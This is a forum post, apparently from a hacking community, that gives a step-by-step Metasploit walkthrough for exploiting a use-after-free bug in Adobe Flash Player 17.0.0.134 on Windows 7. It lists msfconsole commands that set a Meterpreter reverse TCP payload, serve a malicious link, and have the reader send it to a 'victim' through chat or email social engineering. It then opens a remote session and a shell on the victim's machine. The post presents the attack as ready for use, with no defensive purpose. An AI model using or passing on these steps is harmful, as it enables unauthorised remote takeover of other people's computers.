• We just launched and are currently in beta. Join us as we build and grow the community.

Exploit Remote PC using Adobe Flash Player domainMemory ByteArray Use After Free

CalebSimpson

Organic Growth Wizard
Divine
C Rep
0
0
0
Rep
0
C Vouches
0
0
0
Vouches
0
Posts
154
Likes
68
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 200 XP
This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, when forcing a reallocation by copying more contents than the original capacity, but Flash forgets to update the domainMemory pointer, leading to a use-after-free situation when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134.

Exploit Targets

Flash 17.0.0.134

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

0.png


Now type use exploit/windows/browser/adobe_flash_domain_memory_uaf

msf exploit (adobe_flash_domain_memory_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_domain_memory_uaf)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (adobe_flash_domain_memory_uaf)>set srvhost 192.168.1.7

msf exploit (adobe_flash_domain_memory_uaf)>set uripath /

msf exploit (adobe_flash_domain_memory_uaf)>exploit

1.png


Now an URL you should give to your victimhttp://192.168.1.7:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (
http://192.168.1.7:8080) a session will be opened as shown below

2.png


3.png


Now type session –l to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.

4.png
 

452,496

329,392

329,400

Top